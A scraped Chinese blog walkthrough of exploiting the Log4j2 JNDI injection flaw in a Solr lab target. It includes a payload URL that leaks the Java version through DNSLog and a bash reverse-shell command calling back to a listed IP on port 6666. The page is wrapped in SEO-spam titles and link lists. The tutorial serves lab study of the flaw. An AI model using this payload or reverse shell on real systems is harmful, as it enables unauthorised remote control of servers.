当前位置: 首页 > wzjs >正文

免费做网站的方法百度关键词搜索次数

免费做网站的方法,百度关键词搜索次数,dj网站建设,资金盘网站怎么建设log4j2 是Apache的一个java日志框架,我们借助它进行日志相关操作管理,然而在2021年末 log4j2爆出了远程代码执行漏洞,属于严重等级的漏洞。 apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版…
log4j2 是Apache的一个java日志框架,我们借助它进行日志相关操作管理,然而在2021年末 log4j2爆出了远程代码执行漏洞,属于严重等级的漏洞。 apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广,小到网站,大到可联网的车都受影响,建议使用了相关版本的应用或者插件,尽快升级修补,做好相关方措施,避免造成不必要的损失

我们用云服务器执行命令,启动容器,开启靶场环境

 显示done就是启动成功

进入靶场

 

输入命令,利用dnslog来测试靶场,监视注入结果

 

 

在/solr/admin/cores?有个参数可以传,这就是个注入点,我们试试能不能输出java版本,构造payload,访问的url如下:

http://116.62.119.171:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.(dns获取的域名) }

如果存在log4j2漏洞,我们将在DNSLog平台看到回显,返回刚才的DNSLog平台,点击刷新记录Refresh Record

我们先编写恶意文件,将shell反弹到云服务器的6666端口上

因此对应的bash命令为

bash -i >& /dev/tcp/116.62.119.171/6666 0>&1

然后对上述命令进行base64编码

有了编码结果,我们就可以编写恶意文件 

 

 将得到的恶意文件拿到之前的网站进行注入

重新打开一个终端,开启nc监听6666端口

 反弹到shell,我们可以输入windows命令测试

原先的终端窗口也有消息

http://www.dtcms.com/wzjs/464859.html

相关文章:

  • 用dw制作网站模板肇庆seo按天收费
  • 义乌做网站哪家好网络营销推广的特点
  • 长沙装修网站排名桂林网站设计
  • 佛山b2b网站建设360排名检测
  • 网站公安备案时间优化营商环境评价
  • 灰大设计导航西安seo优化系统
  • 网站被恶意刷流量网络营销推广流程
  • 任何查询网站有没有做404店铺推广平台有哪些
  • php 免费企业网站今日头条极速版官网
  • 建设网站价位全国疫情突然又严重了
  • 做视频网站需要多大带宽郑州企业网络推广外包
  • wordpress头像被墙windows优化大师有用吗
  • 个人博客系统源码武汉seo群
  • 做机加工的网站互联网去哪里学
  • 关于网站得精神文明建设自动引流推广软件
  • ims2009 asp企业网站建设北京搜索引擎优化经理
  • 用jsp做的简单网站代码广点通广告平台
  • 威县做网站哪里便宜武汉seo关键词排名
  • 广州网站建设q.479185700強百度竞价包年推广是怎么回事
  • 网站建设要不要监理正规网站建设服务
  • 招商引资平台有哪些关键词优化排名软件s
  • 网站简单代码怎么做小说推广挣钱
  • icp备案查询官方网站网络营销步骤
  • 免费招标平台西安网站seo公司
  • 做直播网站要多少钱中国十大互联网公司
  • 网站维护费大概多少杭州seo网站
  • 做企业网站 需要用服务器吗本网站三天换一次域名
  • 东莞h5网站制作互联网seo是什么意思
  • 手机兼职在哪个网站做爱站网站
  • 小草青青免费观看高清seo发展前景怎么样啊